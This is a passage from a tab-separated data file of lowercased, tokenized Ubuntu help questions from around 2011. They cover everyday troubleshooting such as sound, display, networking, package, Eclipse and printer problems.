81831	laggy sound , how can i know what the problem is ?	lately , i 've been experiencing laggy sound . the only usable syndrome i 've found can be the fact , that is the sound settings in the output tab the connector keeps changing to analog headphones from analog output , this takes only a few milliseconds before it jumps back to analog output . this has been really annoying , because i ca n't play games , listen to music , and enjoy ubuntu in all of it 's beauty . any help would be greatly appreciated . thanks in advance .
81834	how to enable hdmi out with an nvidia 310m ?	i have a laptop with an nvidia 310m card . i ca n't get my hdmi out to work in ubuntu ( i 'm on 11.10 now , but this has n't ever worked ) . my windows partition works fine with hdmi . i 've tried disper and xrandr , neither show the external monitor connected . any tips to test/enable the hdmi interface ?
81835	x doesnt start after running aticonfig	i have hp probook with dual gpu , first integrated by intel and second is radeon 6470m . i have installed proprietary driver ( fglrx ) for amd gpu and then run aticonfig to create xorg.conf . after reboot my x server can not start and throws errors like `` fail to switch libgl link files '' and other . i have oneiric x64 .
81837	dhcp + static ip for dhcp server on eth1 ?	i 'm trying to set up an intranet using dhcp . i 'm using ubuntu 11.04 and a zyxel gs2200-24 managed switch . i installed dhcp3-server . here is my configuration for dhcp ( /etc/dhcp/dhcpd.conf ) : ddns-update-style none ; default-lease-time 600 ; max-lease-time 7200 ; authoritative ; subnet 192.168.1.0 netmask 255.255.255.0 { interface eth1 ; range 192.168.1.2 192.168.1.254 ; option subnet-mask 255.255.255.0 ; option broadcast-address 192.168.1.255 ; } here is setting or /etc/default/isc-dhcp-server : interfaces= '' eth1 '' here is /etc/network/interfaces config for eth1 : auto eth1 iface eth1 inet dhcp now , i try to start my server ( sudo /etc/init.d/isc-dhcp-server ) and i get this error : no subnet delcaration for eth1 ( no ipv4 addresses ) . *ignoring requests on eht1 . if this is not what you want , please write a subnet declaration in your dhcpd.conf file for the network segment to which interface eth1 is attached . * if i assign eth1 an ip address , ( sudo ifconfig eth1 192.168.1.2 ) i can startup just fine . i have not tried routing dhcp requests to the server yet , but it seems as everything is gravy . am i correct that i just need to permanently assign 192.168.1.2 to eth1 , and then i can configure my managed switch to route requests for ip assignment to 192.168.1.2 , my dhcp server ? if so , how can i do that ? do i need to make a config change in /etc/network/interfaces ?
81842	why does my display keep turning off every 10 minutes ?	i have installed ubuntu 11.10 ( oneiric ) in virtualbox as well as virtualbox-guest-additions . the display resolution adapts to the size of the window as expected , but the display turns off after 10 minutes of inactivity . thinking there was some sort of power management issue at play , i went to power in the settings dialog : there does n't really seem to be anything there that mentions `` turn off display after xxx minutes '' so i assume everything is configured correctly there . next i went to screen and found an option there `` turn off after : '' . aha ! i thought . now i have found the option - but alas : even after setting it to `` never '' and restarting multiple times , the display still shuts off after 10 minutes . what am i missing ? what option am i overlooking ?
81844	ungroup with alt tab	i have a `` serious '' issue . i use ubuntu 11.10 and i really like it . there 's just one thing that drives me crazy . can someone tell me how i can ungroup for ex . mozilla with alt tab ? i 've already downloaded compizconfig but i can not unveil this secret . i 've searched many forums but i seem to be the only one not understanding this.. : (
81847	if i download ubuntu 10.04 , having 11.10 , will my files be in in 10.04 ?	i want to download 10.04 . i have 11.10 , but it 's really much slower than 10.04 . so , my question is , if i download it from scratch , will my files from 11.10 still be there ?
81857	how to install an app via ubuntu software center and visualize those commands in terminal ?	i just dipped my toes into linux , and as obvious as it should be , i am starting with ubuntu as it makes life easier for starters . i believe , the best way to get a grip over command line is to use it for all day-to-day activities - - like app installation , copying , moving and deleting files etc . for me , the most trickiest part has been installing apps via command line . reason ? it 's not as simple as $ sudo apt-get install app-name-here - - because sometimes ( if not most of the time ) , we need dependencies etc . having made that clear , now i ask : is there a way to visualize the terminal commands being issued by the ubuntu software center when i am installing an app ? this way i can note down the commands , find the similarities as to how most apps can be installed flawlessly via command line and from then on , install apps via the command line . ( most importantly , this will help me on the server-side as well . )
81860	how to set default folder view to `` list '' ?	i have another somehow weirdly easy question : i would like to use the list view for all folders in ubuntu . is there some kind of template that i could use ?
81862	how do i get my launcher to stay in the unity menu	i want to have a button in my unity launcher that will run a few lines of code in terminal when i click on it . i have created a .sh file , made it executable , created a launcher for it , moved the launcher to /home/.local/share/applications . when i search for the launcher and try dragging it onto unity the message 'drop to add application ' comes up but it does not stay there . any help much appreciated
81865	what simple floss software can i use to produce nice data visualization ?	i am looking here for the best simple and intuitive application that is designed to produce neat looking graphs , for example `` number of ubuntu users in the last 10 years '' or `` average amounts paid by windows , mac and linux users for each humble indie bundle edition '' . i just want it to be easy to produce ( not too many functions ) , and nice looking ( no ugly business charts ) ! thanks for your help !
81867	how can i sync /var/www folder with ubuntu one ?	how can i sync /var/www folder with ubuntu one ? i tried symlink with ln -s /var/www www in my ~/ubuntu one folder and in ~/documents ( which is synchronized too ) , but it seems that it also does n't work . of course i 'm the owner of var/www and i ( and my group ) have all rights ( 771 ) .
81868	failed wireless connection on a thinkpad edge e520 with a centrino wireless-n 1000	i can use my wireless connection without problems either on ubuntu 10.04 or win7 , but ca n't on ubuntu 11.10 . i 'm just unable to find any connection . on terminal rfkill list all with only wireless softblocked ; when trying to rfkill unblock all or rfkill unblock wifi it is still softblocked . nm-tool shows , that i 'm disconected and state for wlan0 is unavaible lshw -c network *-network description : wireless interface product : centrino wireless-n 1000 vendor : intel corporation physical id : 0 bus info : pci @ 0000:09:00.0 logical name : wlan0 version : 00 serial : 74 : e5:0b:18:20 : a0 width : 64 bits clock : 33mhz capabilities : bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlagn driverversion=3.0.0-12-generic firmware=39.31.5.1 build 35138 latency=0 multicast=yes wireless=ieee 802.11bgn resources : irq:45 memory : e1d00000-e1d01fff so is physical id=0 a problem ? is that ubuntu dose n't recognize my wireless interface ? is there anything to change this ? or just use the older version of ubuntu ?
81870	how to download , modify , build and install a debian source package ?	if i want to make minor changes to the source code of a debian package , how do i go about downloading , incrementing the package version , building the ( modified ) source , and installing it on my computer ?
81874	how do i install powertop 1.13 ?	since ubuntu 11.10 a version of powertop is in the repository that is by intent aimed for developers . however for me as a user the old `` classic '' version like 1.13 is better suited . do you know a download possibility for powertop 1.13 in a deb format , as tar doesnt work for me . thanks in advance .
81879	how do i install 32-bit perl-tgicl 2.1.1 ?	i 'm trying to install a .deb and i need some packages but they are not on the synaptic . how can i install this packages lib32z1 libc6-i386 tgicl $ sudo dpkg -i perl-tgicl_2.1-1_all.deb selecting previously deselected package perl-tgicl . ( reading database ... 168515 files and directories currently installed . ) unpacking perl-tgicl ( from perl-tgicl_2.1-1_all.deb ) ... dpkg : dependency problems prevent configuration of perl-tgicl : perl-tgicl depends on lib32z1 ( > = 1:1.1.4 ) ; however : package lib32z1 is not installed . perl-tgicl depends on libc6-i386 ( > = 2.3 ) ; however : package libc6-i386 is not installed . perl-tgicl depends on libfile-homedir-perl ( > = 0.10 ) ; however : package libfile-homedir-perl is not installed . perl-tgicl depends on libfile-spec-perl ( > = 0.10 ) ; however : package libfile-spec-perl is not installed . dpkg : error processing perl-tgicl ( -- install ) : dependency problems - leaving unconfigured processing triggers for man-db ... errors were encountered while processing : perl-tgicl my os : $ uname -a linux 3.0.0-12-generic-pae # 20-ubuntu smp fri oct 7 16:37:17 utc 2011 i686 i686 i386 gnu/linux
81883	how to give all available resources to virtualbox ?	is there a way to push all available resources to the program ( virtualbox ) when running ubuntu ?
81887	how to activate cube and related compiz features without crashing unity ?	i have activated desktop cube feature in compiz by editing the config file way in this link : preference > > export open the exported profile and edit it find âs0_active_pluginsâ and replace wall with cube ; rotate ; save it . preference > > import as ... and make the new profile . but after that , if i tried to activate any feature in compiz , the unity crashes . what to do to activate ( 3d windows ) and ( cube reflection and decoration ) and any other features without crashing unity ?
81890	mouse pointer gets larger in firefox	i 'm having serious problems with ubuntu 11.10 i actually reinstalled it for 3 times because it keeps bugging at the start screen however now it is working i 'm encountering a problem with the mouse pointer size wich gets bigger a lot in firefox like in this screen : and when i 'm on the desktop it gets this size : thanks a lot i really do n't know what i should do : )
81894	desktop install with audigy soundcard - no sound & errors in syslog	new 11.10 x86 desktop installation my new install is mute , troubleshooting provides no help but several of these messages appear in the syslog : nov 21 10:10:33 wrkstax86 pulseaudio [ 1840 ] : [ alsa-sink ] alsa-sink.c : alsa woke us up to write new data to the device , but there was actually nothing to write ! nov 21 10:10:33 wrkstax86 pulseaudio [ 1840 ] : [ alsa-sink ] alsa-sink.c : most likely this is a bug in the alsa driver 'snd_emu10k1 ' . please report this issue to the alsa developers . audio worked with 10.4 , 10.10. and 11.04 on this system is this the show stopper ? how do you report a bug to the alsa developers ?
81898	can not ping static ip on eth1	i am trying to ping the network interface i have set up for eth1 . this is my config : auto eth1 iface eth1 inet static address 192.168.1.2 netmask 255.255.255.0 gateway 192.168.1.1 broadcast 192.168.1.255 if i ping 192.168.1.2 , i get : ping 192.168.1.2 ( 192.168.1.2 ) 56 ( 84 ) bytes of data . from 192.168.1.3 icmp_seq=3 destination host unreachable results of ifconfig tell me that the ipv4 address is 192.168.1.3 . i can ping this ip . bcast and mask are as expected ( same as in definition ) . i can ping 192.168.1.3 from my macbook . i can not ping 192.168.1.2 locally or from my macbook . any ideas why ?
81899	is dual booting ubuntu and fedora/opensuse as easy as popping in a livecd ?	i wish to dual boot ubuntu ( currently installed ) with fedora and/or opensuse ( fedora for vanilla gnome and suse for a good kde experience ) . i do not know much about dual booting and grub . do i only have to put in the livecd and install side by side ? or do i have to partition and stuff ? also , is there an easy way to remove one if i do not want it ? please note that i do not want them on the same /home partition , i want them to have a different one each . ( and also if there is a way that is mostly graphical and user friendly , it would be most appreciated ) edit : what if i wanted to install something like arch of mint ? how would i do that ?
81900	how do i remove kernel 3.1 that i added via a ppa ?	is there a way to remove kernel 3.1 from oneiric ? i downloaded and upgraded to 3.1 with these instructions : open the terminal and run these two commands for both 32-bit and 64-bit versions of ubuntu 11.10/11.04 : wget http : //kernel.ubuntu.com/~kernel-ppa ... 241006_all.deb sudo dpkg -i linux-headers-3.1.0-030100_3.1.0-030100.201110241006_all.deb ubuntu ( 64-bit ) for ubuntu 11.10/11.04 ( 64-bit ) , issue these commands : wget http : //kernel.ubuntu.com/~kernel-ppa ... 1006_amd64.deb sudo dpkg -i linux-headers-3.1.0-030100-generic_3.1.0-030100.201110241006_amd64.deb wget http : //kernel.ubuntu.com/~kernel-ppa ... 1006_amd64.deb sudo dpkg -i linux-image-3.1.0-030100-generic_3.1.0-030100.201110241006_amd64.deb everything went well . i was able to reboot quickly , but firefox and chrome constantly crash with kernel 3.1 . i am using gnome 3.2 and saw improvement with 3.0.0.13 provided by ppa . any help with 3.1 or just removing it would be helpful . thanks to all that reply .
81909	how can i make ubuntu one work on windows ? it says `` file sync starting ... '' forever	i 'm using ubuntu one 2.0.1 on windows 7 64-bit , and i want to sync my files but the application refuses to . it says `` file sync starting '' forever . i left it from morning to evening and it 's still the same . also , i tried reinstalling and deleting registry files then installing again but this did n't help . im sharing my pictures , music and documents folders . in ubuntu , sync is working ok . i searched google and found many people having same problem without a solution .
81919	how do i get package update notifications on login ?	in ubuntu 11.04 server when i would log in via ssh it would tell me how many packages are available for updating in the welcome message . after upgrading to 11.10 i no longer get that information . is there a package i need to install or a config file that needs changing ? 11.04 output : welcome to ubuntu 11.10 ( gnu/linux 3.0.0-12-generic x86_64 ) * documentation : https : //help.ubuntu.com/ 32 packages can be updated . 8 updates are security updates . last login : mon nov 21 16:19:01 2011 from han-solo.local 11.10 output : welcome to ubuntu 11.10 ( gnu/linux 3.0.0-12-server x86_64 ) * documentation : https : //help.ubuntu.com/11.10/serverguide/c no mail . last login : tue nov 22 19:07:19 2011 from han-solo.local
81922	how to prevent terminal from killing process with ctrl+z	i know that you can restore the process by hitting fg and enter after you stop a job with ctrl+z , but i do n't think i 've ever intended to stop a job.. ever . e.g . i always bump it when typing ctrl+x in vim . how can i prevent my bash terminal from stopping jobs when i hit ctrl+z ?
81923	change /usr/lib to /usr/lib32 for eclipse to look for *.so files	i am trying to run eclipse and i am getting : /usr/lib/gio/modules/libgvfsdbus.so : wrong elf class : elfclass64 failed to load module : /usr/lib/gio/modules/libgvfsdbus.so i already found out that it is because this library is 64bits . i have found 32bit version of it and putted in subdirectory of /usr/lib32 but eclipse do not want to look for it there . how can i make it to look for libraries in /usr/lib32 ?
81924	`` sasl authentication failed '' with mutt and gmail , why ?	i am confused by this , i have installed a lot of new packages and followed some tutorials after googling but i keep getting this kind of sasl -error . i am not sure whether the mistake is in some gmail settings or should i check some settings in ubuntu ? i thought this tutorial here would have solved this problem ( i am simply trying to set up local mail reading with mutt , using gmail ) but i can not see the instructed things with telnet : `` 250-starttls 250-auth plain login '' so that is why it is not working . $ cat .muttrc set imap_user = `` xyz @ gmail.com '' set imap_pass = `` pass '' # set smtp_url = `` smtp : //name @ smtp.gmail.com:465/ '' set smtp_url = `` smtp : //name @ smtp.gmail.com:587/ '' set smtp_pass = `` pass '' set from = `` xyz @ gmail.com '' set realname = `` name '' set folder = `` imaps : //imap.gmail.com:993 '' set spoolfile = `` +inbox '' set postponed= '' + [ gmail ] /drafts '' set move = no
81925	how can i disable the notification for received files on gnome ?	when i receive files over bluetooth , my system makes an annoying peep and gives an even more annoying popup for every single file . how can i disable this .
81927	how can i determine the version number of my ubuntu one for windows client ?	i can not find an `` about ... '' link or similar in the release version of ubuntu one for windows . how can i tell what version number of the client i have currently installed ?
81937	how can i enable hdmi sound on a amd/ati hd9550	i have a computer with an amd hd9550 graphic card . i want to output the sound to my tv by hdmi . but i can not get it to work . i have tried config the sound options . and i am not using the additional driver .
81938	foreman does n't start with `` invalid gemspec '' error	like this post i am also trying to complete this heroku tutorial i have installed and used everything ( node.js , npm , express ) successfully until i got to foreman . i installed foreman by first installing ruby : alex @ ubuntu : ~ $ sudo apt-get install ruby1.9.1 then installing foreman . i am a newbie to unix so i `` sudo '' perhaps unnecessarily here , but i got confirmation in the terminal that it had installed but also some errors : alex @ ubuntu : ~/nodehelloworld $ sudo gem install foreman invalid gemspec in [ /var/lib/gems/1.8/specifications/foreman-0.26.1.gemspec ] : invalid date format in specification : `` 2011-11-10 00:00:00.000000000z '' invalid gemspec in [ /var/lib/gems/1.8/specifications/term-ansicolor-1.0.7.gemspec ] : invalid date format in specification : `` 2011-10-13 00:00:00.000000000z '' invalid gemspec in [ /var/lib/gems/1.8/specifications/foreman-0.26.1.gemspec ] : invalid date format in specification : `` 2011-11-10 00:00:00.000000000z '' invalid gemspec in [ /var/lib/gems/1.8/specifications/term-ansicolor-1.0.7.gemspec ] : invalid date format in specification : `` 2011-10-13 00:00:00.000000000z '' successfully installed term-ansicolor-1.0.7 successfully installed foreman-0.26.1 then when i try to start foreman i get similar : alex @ ubuntu : ~/nodehelloworld $ foreman start invalid gemspec in [ /var/lib/gems/1.8/specifications/foreman-0.26.1.gemspec ] : invalid date format in specification : `` 2011-11-10 00:00:00.000000000z '' invalid gemspec in [ /var/lib/gems/1.8/specifications/term-ansicolor-1.0.7.gemspec ] : invalid date format in specification : `` 2011-10-13 00:00:00.000000000z '' /usr/lib/ruby/vendor_ruby/1.8/rubygems.rb:926 : in `report_activate_error ' : could not find rubygem foreman ( > = 0 ) ( gem : :loaderror ) from /usr/lib/ruby/vendor_ruby/1.8/rubygems.rb:244 : in `activate_dep' from /usr/lib/ruby/vendor_ruby/1.8/rubygems.rb:236 : in `activate' from /usr/lib/ruby/vendor_ruby/1.8/rubygems.rb:1307 : in `gem' from /usr/local/bin/foreman:18 can anyone help me ? i am a newbie to unix after finally dumping windows as i found i could not get foreman-windows to work for me either i have found this post from someone with apparently the same issue . does this mean my version of ruby could be wrong ? i am running 1.9.1 , though again new to ruby as well ; alex @ ubuntu : ~/nodehelloworld $ ruby1.9.1 -v ruby 1.9.2p290 ( 2011-07-09 revision 32553 ) [ i686-linux ] thanks
81939	foreman : command not found	i am following this tutorial of heroku . i installed foreman with sudo gem install foreman but when i try to use this in the terminal with command foreman this returns foreman : command not found
81944	ubuntu one file sync pause/resume for large files	dropbox client has a `` pause syncing '' option . is there a way to pause/resume large files sync in ubuntu one ? i want to make some video calls and the transfer consumes valuable bandwidth , making call quality poor .
81945	blank page when i try to comment , chat , or `` like '' something on facebook	facebook , navigating with google chrome 15.0.874.121 and using ubuntu 11.10 , when i try to comment , chat or give a `` like it '' the next blank page appears and do n't let me do anything : http : //www.facebook.com/ajax/ufi/modify.php i 've tried with , based on what i found in internet : erasing cookies and cache desynchronize chrome before erasing it uninstalling chrome with : sudo apt-get purge google-chrome-stable erasing manually : /.config/google-chrome directory and nothings solves the problem , any ideas , would appreciate your help thanks
81946	login failure after new install	i recently installed ubuntu 10.04 on my macbook . i have it running smoothly on here , but when i used the same disk to install ubuntu on a friend 's dell laptop it is n't working correctly . after the installation process he logged in and everything ran just fine . however when he shut the computer down and later turned it back on , he ca n't log on . he 's using the same login information as before but he keeps getting an authorization failure . i 've had him try using his short username and the full name but neither will work . is this a hardware problem because of his computer or did something go wrong with the installation ?
81947	ubuntu 11.10 does n't boot anymore after kernel update	after the kernel upgrade to 3.0.0.13.15 my system does n't boot anymore . i have to manually shut down the system , reboot and choose the old kernel to be able to boot my system . the only thing i see is that caps and scroll lock are blinking/flashing . the system hangs on the purple grub background . does anyone have an idea how to fix that problem ?
81957	ubuntu one verification image never loads	i am trying to create a ubuntu one account but the verification image just keeps loading .
81960	how do i stop orca from starting up on login ?	orca keeps starting up after system starting , and im not able to find it in `` startup applications '' . how to stop it ? ?
81962	virtualbox version 4.1.6 not displaying window	i am using macbook pro 15 inch with mac lion 8gb on memory and 1gb of video . i have virtualbox version 4.1.6 r74713 and the lasted version of ubuntu . i have a problem with window is not appearing after i installed `` guest addition ... ''
81963	mfc-240c printer still not showing up after installing lpr drivers	i am trying to get my brother mfc-240c printer to work but i think i must be missing a step . i think i successfully installed the lpr drivers using the command supplied in this post but the printer is still not showing up when i try to print . its quite possible i am forgetting an obvious step . any further ideas or steps i need to take ?
81964	how to install madwifi ?	i want to use the wlanconfig tool on my newly installed ubuntu 11.10 . however i can not find the madwifi package to install with . i tried to install the module-assistant and used module-assistant to auto install madwifi package . apparently the madwifi package is not available . how can i install the wlanconfig tool then ? i thought it is installed as default , but i am wrong .
81971	how do i change screen resolution automatically when computer starts up ?	i am using following command to change my screen resolution : xrandr -- newmode `` 1368x768_60.00 '' 85.25 1368 1440 1576 1784 768 771 781 798 -hsync +vsync xrandr -- addmode vga1 1368x768_60.00 xrandr -- output vga1 -- mode 1368x768_60.00 now , which file do i need to edit so it will modify my screen resolution when i start up my ubuntu pc ? note : editing .xprofile is n't ideal since it 's only per-user , not system-wide , and gdm/kdm does n't existed on a vanilla 11.10 install , nor does xorg.conf
81975	are there any other sources for ubuntu 9.10 ?	i am now using ubuntu 11.10 but i would like to download ubuntu 9.10 for testing purposes ( compiz experimental plugins ) . my bandwith is very slow , so i am using a download manager that will support downloading files from multiple sources ( downthemall firefox extension ) . the problem is , i can only find one source for this file , which is on the main ubuntu server . are there any other sources for this file ?
81981	kernel panic at boot with busybox and init error messages	how do i reboot my computer ? a friend of mine started my computer over from scratch , then installed ubuntu on my computer . but , when my computer ran out of power and i charged it , the computer turned on with this message : busybox v1.13.3 ( ubuntu 1:1.13.3-1ubuntu11 ) built-in shell ( ash ) enter help for a list of built in commands . after this , i pressed enter a couple of times , and then typed exit , then pressed enter a few more times . i then saw this message : /init : line 271 : ca n't open /root/dev/console : no such file [ 138.437851 ] kernel panic - not syncing : attempted to kill init ! what should i do ? i ca n't afford to buy another computer right now .
81982	workspaces page blue	when i go onto the workspaces page on ubuntu 11.10 the background images on the 4 viewable workspaces are all blue . i can still see running programs on the workspaces page . when i change to the workspaces to the one i want to go on it is very laggy and takes a while to load . this is in unity 2d .
81987	problem installing the latest eclipse ide	i 'm running ubuntu 11.04 . i 'm trying to install the latest `` eclipse for java developers '' ide ( version indigo 3.7.1 ) . i have downloaded and extracted it . i attempt to run it by changing to the extracted folder and executing ./eclipse this produces the following errors in the terminal : > /usr/lib/gio/modules/libgiobamf.so : wrong elf class : elfclass64 failed > to load module : /usr/lib/gio/modules/libgiobamf.so > /usr/lib/gio/modules/libgvfsdbus.so : wrong elf class : elfclass64 > failed to load module : /usr/lib/gio/modules/libgvfsdbus.so and then a dialog opens with this error message : jvm terminated . exit code=13 /usr/bin/java -dosgi.requiredjavaversion=1.5 -xx : maxpermsize=256m -xms40m -xmx384m -jar /opt/eclipse//plugins/org.eclipse.equinox.launcher_1.2.0.v20110502.jar -os linux -ws gtk -arch x86 -showsplash -launcher /opt/eclipse/eclipse -name eclipse -- launcher.library /opt/eclipse//plugins/org.eclipse.equinox.launcher.gtk.linux.x86_1.1.100.v20110505/eclipse_1407.so -startup /opt/eclipse//plugins/org.eclipse.equinox.launcher_1.2.0.v20110502.jar -- launcher.overridevmargs -exitdata 2f80031 -product org.eclipse.epp.package.java.product -clean -vm /usr/bin/java -vmargs -dosgi.requiredjavaversion=1.5 -xx : maxpermsize=256m -xms40m -xmx384m -jar /opt/eclipse//plugins/org.eclipse.equinox.launcher_1.2.0.v20110502.jar i 'd appreciate any help / insight . update i should mention that i 'm running 32 bit ubuntu and i 'm trying to install 32 bit eclipse . update # 2 oops - i just realized that i 'm running 64 bit ubuntu , not 32 bit ubuntu .
81990	can not boot win xp or ubuntu from hard drive - get input not supported	1 ) downloaded 11.10 iso file to dell xp workstation 2 ) made bootable usb using pendrivelinux 3 ) installed to harddrive using option 1 ( install along side windows ) 4 ) rebooted when instructed 5 ) booted into ubuntu just fine ( first time ) 6 ) attempted restart - got first splash screen followed by `` input not supported '' - tapped esc and eventually got into ubuntu 7 ) later attempts failed - got `` input not supported '' ; no eventual boot 8 ) many retries holding / tapping various keys - same result 9 ) booted from usb - all files appear to be in place - can access grub on harddrive suggestions appreciated - must to be able to boot xp . thanks in advance
81997	gnome shell bar / indicator for file operations	11.10 & gnome shell 3.2 i 'd like to have an indicator that shows , like in gnome 2.x , for instance , the progression of a long file copy or multiple file copy ; do you have any clou ? thanks paolo
82000	remote desktop from ubuntu to windows	i want to take remote desktop from ubuntu to windows xp and 7 , i am looking for a solution i can install software over the air . vnc , avoid installation of vnc server in windows ( policy problem ) looking software like dameware in software is installed over the air and removed backed after the job is done . should allow to control the current active desktop and interact with the user session . please help me .
82001	new windows from the dock in gnome shell	i am using gnome shell on ubuntu 11.10 , and i frequently use workspaces , as the shell encourages to do . my only complaint is that it is slow to place different windows of the same program in different workspaces . what i would like to do : click on an empty workspace , click on the nautilus icon in the dock and browse to the correct folder . then click on another empty workspace , click on the nautilus icon and so on . this does not work : the second time i open nautilus , the dock lets me switch to the previous instance , which is almost never what i want . so i have to click on the nautilus icon , open a new window , place it on a different desktop , switch to that folder and finally browse to the correct folder . is there a way to simplify this flow ? it would be even better if i was able to link a specific folder from the dock , or better yet to have something similar to a unity lens , where i can choose between the most used folders .
82002	how to set up a ( relatively ) secure kiosk on natty ?	i 'm trying to get my application to be the only thing a user sees when the machine is powered on - like a kiosk , but a little more secure . ideally , what i 'd like to happen is this : at machine power-on , the user sees the ubuntu splash image , then my app . while the app is running , the user ca n't get back to the desktop or a text login prompt via any keyboard shortcut . this is the ( relatively ) secure bit . when the user exits the app , the user sees a shutdown image , then the machine powers off . in particular , i 'd like to configure things so that the user never sees the gnome desktop on startup or shutdown . at the moment , i 've configured a default user to be logged on automatically , with an autostart item which starts my app , but after the ubuntu startup screen the user sees the gnome desktop briefly before my app is started . when the app is exited , the user is taken back to the gnome desktop and has to shut the machine down manually . also , because of time constraints , i ca n't really start over with a different window manager . is there an easy way to configure all of this ?
82003	restoring an ubuntu server using zfs raidz for data	having become disillusioned with hacking buffalo nas devices , i 've decided to roll my own home server . after some research , i have settled on an hp proliant microserver with ubuntu server and zfs ( os on 1 ext4 disk , data on 3 raidz disks ) . as joel spolsky and geoff atwood say with regards to backup , i ca n't rest until i have done a restore in all of the failure scenarios that i am seeking to protect against . q : how to configure ubuntu server to recognise a pre-existing raidz array ? clearly if one of the data disks die - then that is a resilvering scenario , which is well documented . if two of the data disks die , then i am into regular backup/restore land . if the os dies and i can restore , also an easy scenario . but if the os dies and i ca n't restore , then i need to recreate an ubuntu server . but how do i get this to recognise my raid-z array ? is the necessary configuration information stored within and across the raiz array and simply need to be found ( if so , how ) ? or does it reside on the os ext4 disk ( in which case how do i recreate it ) ?
82005	which open source tool can i use to create a website tree diagram using ubuntu ?	which open source tool can i use to create a website tree diagram using ubuntu ? i was looking in dia but it is not that simple . something like this would be good : thanks .
82007	how do i disable ctrl+alt+left/right ?	i use gnome classic . there is no ctrl+alt+left/right shortcut in system settings - > keyboard - > shortcuts . it should be configured somewhere else . but where ?
82008	running ubuntu server from a usb key / thumb drive ( being mindful of flash 's write limitations )	having become disillusioned with hacking buffalo nas devices , i 've decided to roll my own home server . after some research , i have settled on an hp proliant microserver with ubuntu server and a zfs raid-z array for data . i settled on this configuration after trying and regretfully rejecting freenas because the logitech media server ( lms ) software is n't available on the amd64 flavour of this platform and because i think debian/ubuntu server is a better future-proof platform . i considered open media vault , but concluded that it is n't quite yet ready for my purposes . that said , freenas does include the option to run itself off a 2gb+ flash device like usb key or thumb drive . apparently freenas is mindful of the write limitations of flash devices and so creates virtual disks for running the os , writing only the required configuration information back to flash . this would give me an extra data drive slot . q : can ubuntu server be configured sensibly to run off a flash device such as a usb key/thumb drive ? if so , how ? the write limitations of flash should be accounted for .
82014	how to fix a ruined package catalog ?	after installing mono-complete on my ubuntu 11.10 , something got corrupted in the package catalog . whenever i try to install\remove anything i get an error and told to use apt-get -f install . i get the same thing from the gui . when i try to do it , i get the following error : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following extra packages will be installed : mono-devel mono-xbuild the following new packages will be installed : mono-devel mono-xbuild 0 upgraded , 2 newly installed , 0 to remove and 83 not upgraded . 2 not fully installed or removed . need to get 0 b/2,256 kb of archives . after this operation , 9,048 kb of additional disk space will be used . do you want to continue [ y/n ] ? y ( reading database ... 269743 files and directories currently installed . ) unpacking mono-xbuild ( from ... /mono-xbuild_2.10.5-1_all.deb ) ... dpkg : error processing /var/cache/apt/archives/mono-xbuild_2.10.5-1_all.deb ( -- unpack ) : unable to open '/usr/lib/mono/4.0/xbuild.exe.dpkg-new ' : no such file or directory no apport report written because maxreports is reached already unpacking mono-devel ( from ... /mono-devel_2.10.5-1_all.deb ) ... dpkg : error processing /var/cache/apt/archives/mono-devel_2.10.5-1_all.deb ( -- unpack ) : unable to open '/usr/lib/mono/2.0/al.exe.dpkg-new ' : no such file or directory no apport report written because maxreports is reached already processing triggers for man-db ... errors were encountered while processing : /var/cache/apt/archives/mono-xbuild_2.10.5-1_all.deb /var/cache/apt/archives/mono-devel_2.10.5-1_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i understand that i 'm missing some mono files\directories , but i ca n't reinstall mono because apt-get just tells me to run apt-get -f install - which does n't work . how can i fix this ? update running apt-get update gives me the following errors : w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/edgy/universe/source/sources 404 not found [ ip : 91.189.88.46 80 ] w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/edgy/universe/binary-i386/packages 404 not found [ ip : 91.189.88.46 80 ] w : failed to fetch http : //ppa.launchpad.net/mozillateam/firefox-stable/ubuntu/dists/oneiric/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/mozillateam/firefox-stable/ubuntu/dists/oneiric/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead
82015	shutting down ubuntu server running in headless virtualbox	i 'm running ubuntu server using vboxheadless . how do i send acpi shutdown signal through virtualbox and make ubuntu server respect it and comply with the shutdown signal ?
82016	network printer found but can not print	i 'm running ubuntu 11.04 on my laptop and try to use a network printer . adding the printer to ubuntu works without problems but when i try to print something the print job stays in the queue and nothing happens . then i realized that the printer is not enabled . but enabling leads to an error message saying : there was a problem sending document 'test page ' ( job 6 ) to the printer . when clicking the `` diagnose '' button and clicking through the printing troubleshooter it says i should enable the printer what i 'm already trying to do . so i 'm stuck . any ideas what i can do ? update : here the output of the error_log that gets written when trying to print a test page . e [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] no % % boundingbox : comment in header ! e [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] unable to locate printer 'brn001ba93a3d6f ' ! d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] the following messages were recorded from 15:23:19 to 15:23:19 d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] adding start banner page `` none '' . d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] adding end banner page `` none '' . d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] file of type application/postscript queued by `` florian '' . d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] hold_until=0 d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] queued on `` brother-mfc-8880dn '' by `` florian '' . d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] job-sheets=none , none d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] argv [ 0 ] = '' brother-mfc-8880dn '' d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] argv [ 1 ] = '' 8 '' d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] argv [ 2 ] = '' florian '' d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] argv [ 3 ] = '' test page '' d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] argv [ 4 ] = '' 1 '' d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] argv [ 5 ] = '' pagesize=letter job-uuid=urn : uuid : cb5143f4-2b18-398d-5ce8-bb41f8ff3539 job-originating-host-name=localhost time-at-creation=1322058199 time-at-processing=1322058199 ap_d_inputslot= '' d [ 23/nov/2011:15:23:19 +0100 ] [ job 8 ] argv [ 6 ] = '' 